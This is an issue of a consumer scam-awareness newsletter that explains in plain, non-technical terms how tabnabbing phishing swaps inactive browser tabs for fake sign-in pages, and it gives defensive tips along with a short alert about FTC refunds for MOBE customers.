Tabnab Scammers Hijack Web Browsers

What is tabnabbing and how can you spot it?: Internet Scambusters #822

Tabs that allow you to keep multiple pages open in your web browser are the target for a sneaky phishing scam called tabnabbing.

By secretly changing the content of inactive pages, hackers can trick you into giving away confidential information about yourself.

In this week’s issue, we explain how tabnabbing works and what you can do to beat the tricksters….

Tabnab Scammers Hijack Web Browsers

Are you at risk of being tabnabbed?

It’s a sneaky trick hackers and scammers are using to access and change tabbed pages that you have open but not active in your Internet browser.

Here’s the deal:

When most of us use an Internet browser, be it Chrome, Firefox, Internet Explorer, Edge or Safari, we often open multiple pages and keep them open so we can move back and forth between pages.

We do this by clicking on the tabs for each page, which are helpfully inserted by the browser.

Now, think back to what happens if you open a bank web page or some other site where you store confidential information, like sign-on details.

Oftentimes, these secure sites will log you out if the page is inactive for a certain amount of time. Then, when you revisit it, the page tells you that you’ve been signed out and asks you to sign in again.

What a tabnabber does is take control of that page while it’s inactive and replace it with a replica of the genuine page. Then, when you sign on again, you inadvertently give away your sign-on details and maybe other confidential information.

That’s tabnabbing. It’s a clever phishing trick and It’s been around for many years, exploiting the way web pages are scripted (written) to perform the trick.

In some cases, hackers may completely change an inactive page to one they know or suspect the user might visit from time to time — for example, changing a Wikipedia page the user had open to, say, a fake but genuine-looking Citibank sign-on page.


They’re hoping that the user will be sufficiently inattentive to think they must have previously opened the Citibank page, so they sign on, giving away access to their account.

The scam originally focused on spoofing the sign-on page of Google’s Gmail service but now, according to security services, it can be used to fake just about any site. It also changes the “favicon” for the page — the tiny icon that appears next to the page title in the tab.

And once the crook has your sign-on details, they can visit your account wherever that might be (even if it’s a non-financial site) and find other information about you that’s useful for identity theft, such as the answers to security questions, home address, Social Security numbers and date of birth.

The trouble is — and this is what makes tabnabbing particularly effective — that we tend to trust our browsers and those handy tabs, switching from one to the other without thinking and often not taking the time to check on security.

For example, how often do you bother to check the address line of a particular page to be sure it begins with the secure “https” label instead of the non-secure “http”?

3 Actions

There are three things you can do to eliminate the risk of being a tabnab victim.

First, get into the habit of closing tabs when you’ve finished with a particular website. If you have to reopen it, at least you’ll be keying in the correct address from the outset.

Second, if you do leave your tabs open, be alert to which contents should be shown there. If the page is different to the one you thought it should be, close it.

Third, just to be doubly sure, if you revisit a tabbed page that says you’ve been signed out and invites you to sign in again, close the tab and start over.

Some browsers offer extensions (mini add-on programs) that claim to be able to stop tabnabbers, while others claim that by disabling JavaScript (a programming language used on certain webpages) you will be secure.

However, other security experts suggest these may not be totally effective and that hackers have found a way around these defenses.

Alternatively, if you use a password manager that automatically inserts your sign-on details, this will likely check to see if the page is the same one where you originally saved them. If not, it will simply not enter the information — a clear red flag signaling trouble ahead.

Tabnabbing is not new. It’s been with us for many years. But the fact that it is still around and in widespread use indicates how effective it is. Beware!

Alert of the Week

Have you lost money to a business coach involving a company called MOBE, which had its operations suspended as a result of action by the U.S. Federal Trade Commission (FTC)?

If so, the Commission says it’s hoping to secure refunds in the coming months. But the case against MOBE, and the FTC’s investigations, are not yet complete.

Learn more about the alleged scam and your entitlement to a refund here: What you need to know if you were a MOBE customer.

Time to close today, but we’ll be back next week with another issue. See you then!